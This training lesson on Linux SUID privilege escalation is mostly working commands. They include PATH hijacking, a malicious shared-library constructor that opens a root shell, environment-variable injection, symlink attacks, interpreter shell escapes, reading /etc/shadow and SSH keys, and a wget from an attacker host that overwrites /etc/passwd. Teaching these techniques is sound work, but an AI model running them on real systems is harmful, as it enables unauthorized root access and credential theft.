SUID Exploitation Techniques

intermediate35 minWriteup

Various methods to exploit SUID binaries

Learning Objectives

  • Exploit common SUID binaries
  • Use shared library attacks
  • Exploit PATH manipulation
  • Chain SUID vulnerabilities

You've found

- now what? Beyond simple GTFOBins lookups, SUID exploitation includes shared library attacks, PATH manipulation, and environment variable abuse. These techniques work even on seemingly "safe" binaries.

Think of SUID exploitation like social engineering a bouncer. Even if the bouncer (binary) is strict, you can trick them by changing the environment they trust - fake libraries, modified PATHs, or manipulated variables they depend on.

Beyond GTFOBins

GTFOBins covers direct exploitation. This lesson covers indirect methods - attacking the environment and dependencies of SUID binaries.

PATH Manipulation

If a SUID binary calls other commands without full paths, you can manipulate PATH to make it run your malicious version instead.

bash
1606070;"># Example: SUID binary calls "service apache2 restart"
2606070;"># The binary trusts PATH to find "service"
3 
4606070;"># 1. Analyze the binary
5strings /usr/local/bin/backup | grep -i service
6606070;"># Output shows: service mysql restart
7 
8606070;"># 2. Check if it uses relative path (no /usr/bin/service)
9ltrace ./backup 2>&1 | grep -i exec
10606070;"># If you see: system("service mysql restart")
11606070;"># It uses relative path = vulnerable!
12 
13606070;"># 3. Create malicious "service" binary
14echo 606070;">#a5d6ff;">'#!/bin/bash' > /tmp/service
15echo 606070;">#a5d6ff;">'/bin/bash -p' >> /tmp/service
16chmod +x /tmp/service
17 
18606070;"># 4. Modify PATH to prioritize /tmp
19export PATH=/tmp:$PATH
20 
21606070;"># 5. Run the SUID binary
22./backup
23606070;"># Now our fake "service" runs as root!

Finding PATH Vulnerable Binaries

bash
1606070;"># Look for system() or exec* calls with relative paths
2strings /path/to/suid | grep -E 606070;">#a5d6ff;">"^[a-z]"  # Commands without /
3 
4606070;"># Common patterns to look for:
5strings /path/to/suid | grep -E 606070;">#a5d6ff;">"service|cat|ls|cp|mv|rm"
6 
7606070;"># Use ltrace to see library calls
8ltrace ./suid_binary 2>&1
9 
10606070;"># Use strace to see system calls
11strace ./suid_binary 2>&1 | grep exec

Modern Protections

Many systems ignore PATH for SUID binaries or use full paths. This technique works mainly on older systems or custom binaries.

Shared Library Hijacking

If you can write to directories where a SUID binary looks for libraries, you can inject malicious code that runs as root.

bash
1606070;"># Check library dependencies
2ldd /path/to/suid_binary
3606070;"># Example output:
4606070;"># linux-vdso.so.1
5606070;"># libcustom.so => /opt/libs/libcustom.so
6606070;"># libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6
7 
8606070;"># Check for writable library paths
9ls -la /opt/libs/
10606070;"># If writable, we can replace libcustom.so!
11 
12606070;"># Check LD_LIBRARY_PATH (usually blocked for SUID)
13606070;"># Check /etc/ld.so.conf and /etc/ld.so.conf.d/
14 
15606070;"># RPATH/RUNPATH in binary
16readelf -d /path/to/suid_binary | grep -i path
17606070;"># If RPATH points to writable location = vulnerable

Creating Malicious Library

c
1606070;">// malicious.c - Compile and replace target library
2606070;">#include <stdio.h>
3606070;">#include <stdlib.h>
4606070;">#include <unistd.h>
5 
6606070;">// Constructor runs when library loads
7static void inject() __attribute__((constructor));
8 
9void inject() {
10    setuid(0);
11    setgid(0);
12    system(606070;">#a5d6ff;">"/bin/bash -p");
13}
bash
1606070;"># Compile the malicious library
2gcc -shared -fPIC -o libcustom.so malicious.c
3 
4606070;"># Replace the original (if writable)
5cp libcustom.so /opt/libs/
6 
7606070;"># Or use LD_PRELOAD if SUID binary allows (rare)
8606070;"># LD_PRELOAD=./malicious.so ./suid_binary
9 
10606070;"># Run the SUID binary - our constructor executes!
11./suid_binary

Environment Variable Abuse

bash
1606070;"># Some SUID binaries trust environment variables
2 
3606070;"># LD_PRELOAD (usually blocked for SUID, but check)
4LD_PRELOAD=/tmp/malicious.so ./suid_binary
5 
6606070;"># LD_LIBRARY_PATH (usually blocked)
7LD_LIBRARY_PATH=/tmp ./suid_binary
8 
9606070;"># BASH_ENV (for bash SUID)
10BASH_ENV=/tmp/evil.sh ./suid_bash
11 
12606070;"># PS4 (bash debug mode)
13606070;"># If SUID binary runs bash scripts:
14env -i SHELLOPTS=xtrace PS4=606070;">#a5d6ff;">'$(chmod u+s /bin/bash)' ./suid_script
15 
16606070;"># HOME directory manipulation
17606070;"># Some binaries read config from $HOME
18HOME=/tmp ./suid_binary

Modern Linux Blocks Most

Modern Linux ignores LD_PRELOAD and LD_LIBRARY_PATH for SUID binaries. But custom or older binaries might still be vulnerable to other environment variables.

Symlink Attacks

bash
1606070;"># If SUID binary creates files in predictable locations
2606070;"># You can symlink to sensitive files
3 
4606070;"># Example: SUID binary creates /tmp/app.log
5606070;"># 1. Create symlink before it runs
6ln -s /etc/passwd /tmp/app.log
7 
8606070;"># 2. Run the SUID binary
9./suid_binary
10 
11606070;"># 3. If it writes to /tmp/app.log, it actually writes to /etc/passwd!
12 
13606070;"># Race condition version (TOCTOU):
14606070;"># Create symlink between binary's check and write
15 
16606070;"># Watch for file operations
17strace ./suid_binary 2>&1 | grep -E 606070;">#a5d6ff;">"open|write|create"

Abusing Binary Features

Editors and Pagers

bash
1606070;"># vim/vi
2./suid_vim -c 606070;">#a5d6ff;">':!/bin/bash -p'
3./suid_vim -c 606070;">#a5d6ff;">':set shell=/bin/bash' -c ':shell'
4606070;"># Inside vim: :!bash -p
5 
6606070;"># less
7./suid_less /etc/passwd
8606070;"># Then type: !/bin/bash -p
9 
10606070;"># more
11./suid_more /etc/passwd
12606070;"># Then type: !/bin/bash -p
13 
14606070;"># man
15./suid_man man
16606070;"># Then type: !/bin/bash -p
17 
18606070;"># nano
19606070;"># Ctrl+R (read file), Ctrl+X (execute)
20606070;"># Can read sensitive files at minimum

File Operations

bash
1606070;"># cp - Copy files as root
2./suid_cp /etc/shadow /tmp/shadow_copy
3606070;"># Now crack the hashes!
4 
5606070;"># Or overwrite passwd
6./suid_cp /tmp/evil_passwd /etc/passwd
7 
8606070;"># cat - Read any file
9./suid_cat /etc/shadow
10./suid_cat /root/.ssh/id_rsa
11 
12606070;"># mv - Move/rename files
13./suid_mv /etc/shadow /tmp/shadow_backup
14 
15606070;"># chmod - Change permissions
16./suid_chmod 777 /etc/shadow
17 
18606070;"># chown - Change ownership
19./suid_chown youruser /etc/shadow

Network Tools

bash
1606070;"># nmap (old versions with interactive)
2./suid_nmap --interactive
3nmap> !bash -p
4 
5606070;"># tcpdump
6./suid_tcpdump -nn -i lo -w /dev/null -W 1 -G 1 -z /tmp/shell.sh
7606070;"># shell.sh contains: /bin/bash -p
8 
9606070;"># wget/curl - Download and overwrite
10./suid_wget http:606070;">//attacker/evil_passwd -O /etc/passwd

Language Interpreters

bash
1606070;"># Python
2./suid_python -c 606070;">#a5d6ff;">'import os; os.setuid(0); os.system("/bin/bash -p")'
3 
4606070;"># Or:
5./suid_python -c 606070;">#a5d6ff;">'import pty; pty.spawn("/bin/bash")'
6 
7606070;"># Perl
8./suid_perl -e 606070;">#a5d6ff;">'exec "/bin/bash -p";'
9 
10606070;"># Ruby
11./suid_ruby -e 606070;">#a5d6ff;">'exec "/bin/bash -p"'
12 
13606070;"># Lua
14./suid_lua -e 606070;">#a5d6ff;">'os.execute("/bin/bash -p")'
15 
16606070;"># PHP
17./suid_php -r 606070;">#a5d6ff;">'system("/bin/bash -p");'
18 
19606070;"># Node.js
20./suid_node -e 606070;">#a5d6ff;">'require("child_process").spawn("/bin/bash", ["-p"], {stdio: [0, 1, 2]})'
21 
22606070;"># awk
23./suid_awk 606070;">#a5d6ff;">'BEGIN {system("/bin/bash -p")}'

SUID Exploitation Methodology

Advanced SUID Attack Flow

1
Analyzestrings, ltrace, strace the binary
2
DependenciesCheck ldd for libraries, readelf for RPATH
3
Path AbuseLook for relative command calls
4
Library AttackCheck for writable library paths
5
EnvironmentTest environment variable influence
6
FeaturesUse built-in shell escapes/features

Knowledge Check

Quick Quiz
Question 1 of 3

How does PATH manipulation work for SUID exploitation?

Challenges

PATH Exploitation

Challenge
🔥 intermediate

Given a SUID binary that calls 'cat' without a full path, exploit it using PATH manipulation to gain a root shell.

Need a hint? (4 available)

Key Takeaways

  • PATH manipulation exploits relative command calls
  • Library hijacking works when library paths are writable
  • Modern Linux blocks LD_PRELOAD for SUID binaries
  • Analyze binaries with strings, ltrace, strace
  • Language interpreters (python, perl) often allow shell escapes
  • Editor shell escapes (vim, less) work on SUID editors